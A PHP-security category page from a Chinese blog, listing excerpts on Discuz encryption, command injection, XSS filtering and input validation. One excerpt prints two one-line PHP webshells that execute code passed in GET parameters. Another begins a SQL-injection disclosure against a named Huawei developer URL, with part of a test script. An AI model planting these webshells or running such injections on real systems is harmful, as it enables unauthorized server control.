没想到啊

  博客园 :: 首页 :: 博问 :: 闪存 :: 新随笔 :: 联系 :: 订阅 订阅 :: 管理 ::
  6 随笔 :: 379 文章 :: 97 评论 :: 24万 阅读
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

文章分类 -  PHP-security

discuz 的加密与解密函数authcode解析
摘要:https://www.akii.org/discuz-encryption-and-decryption-functions-authcode-analysis.htmldiscuz的 authcode 函数可以说对中国的PHP界作出了重大贡献。包括康盛自己的产品,以及大部分中国使用PHP的公司都用这个函数进行加密,authcode 是使用异或运算进行加密和解密。原理如下,假如:加密明文:1010 1001密匙:1110 0011密文:0100 1010得出密文0100 1010,解密之需和密匙异或下就可以了解密密文:0100 1010密匙:1110 0011明文:1010 1001并没有什 阅读全文
posted @ 2012-09-18 21:54 没想到啊 阅读(510) 评论(0) 推荐(0) 编辑

PHP 一句话木马
摘要:<?php eval(stripcslashes($_GET['e']));<?php@$_GET['a']($_GET['b']);?> 阅读全文
posted @ 2012-09-12 15:22 没想到啊 阅读(348) 评论(0) 推荐(0) 编辑

PHP漏洞全解
摘要:命令注入攻击PHP中可以使用下列5个函数来执行外部的应用程序或函数system、exec、passthru、shell_exec、“(与shell_exec功能相同)函数原型string system(string command, int &return_var)command 要执行的命令return_var 存放执行命令的执行后的状态值string exec (string command, array &output, int &return_var)command 要执行的命令output 获得执行命令输出的每一行字符串return_var 存放执行命令后的状 阅读全文
posted @ 2012-05-10 11:29 没想到啊 阅读(246) 评论(0) 推荐(0) 编辑

华为智慧云存在SQL注入及修补方案
摘要:作者: Matrix简要描述:华为智慧云存在SQL注入,理论上可修改后台数据详细说明:http://developer.huaweidevice.com/dev_creg.php用户名验证POST数据不严格,提交地址 /dev_creg/preg.php?ckuser=1参考如下测试脚本:import httplib, urllibimport sysif len(sys.argv) < 2: exit(0)headers = { "Accept": "*/*", "Accept-Language": "zh-CN,z 阅读全文
posted @ 2012-03-26 08:42 没想到啊 阅读(328) 评论(0) 推荐(0) 编辑

why use xss_clean
摘要:全文转自:http://stackoverflow.com/questions/5337143/codeigniter-why-use-xss-cleanif I'm sanitizing my DB inserts, and also escaping the HTML I write withhtmlentities($text, ENT_COMPAT, 'UTF-8')- is there any point to also filtering the inputs with xss_clean? What other benefits does it give? 阅读全文
posted @ 2011-11-02 16:46 没想到啊 阅读(240) 评论(0) 推荐(0) 编辑

一段xss_clean代码
摘要:来自:http://pastie.org/1682584// -------------------------------------------------------------------- /** * XSS Clean * * Sanitizes data so that Cross Site Scripting Hacks can be * prevented. This function does a fair amount of work but * it is extremely thorough, designed to prevent even the *... 阅读全文
posted @ 2011-11-01 09:52 没想到啊 阅读(971) 评论(0) 推荐(0) 编辑

ctype:php的高效字符串校验,PHP安全检查
摘要:全文转自:http://www.enjoyphp.com/2009/development/php/ctype-php/ctype是PHP的一个外部扩展库,它提供一个非常迅速的机制,专门针对字符串内容的校验功能。PHP从4.0.4开始支持该函数,从4.2.0开始内置该扩展库,新安装的PHP程序默认开启该函数库。虽然各版本之间有一定区别,到5.1以后基本稳定,功能也更合理化。首先看一个应用ctype扩展的例子:01<?php02if(!ctype_alnum($_GET['login'])) {03echo"输入项必须为英文字符或数字0-9。";04}0 阅读全文
posted @ 2011-10-29 14:48 没想到啊 阅读(502) 评论(0) 推荐(0) 编辑

php过滤器
摘要:在以前,一个用户通过网络主要是获取信息。而如今的网络刚更注重与用户的交互,用户不再仅仅是网站的浏览者,也是网站内容的制造者。由以前单纯的“读”向“写”以及“共同创作”发展,由被动接收信息向主动分行信息发展。而随之而来的安全问题也成了web开发者不可忽视的问题,验证第三方来源的数据成了每个web程序必不可少的功能。在以前,PHP需要验证数据,一般都是程序员自己通过正则表达式实现,而从PHP从5.2开始把原本的PCEL中的filter函数移到了内置库中,并做了不少强化,可以用这些函数实现对数据的过滤和验证。数据来源及验证类型PHP中的数据来源包含两部分,其一是外部变量(如POST、GET、COOK 阅读全文
posted @ 2011-10-25 10:45 没想到啊 阅读(997) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示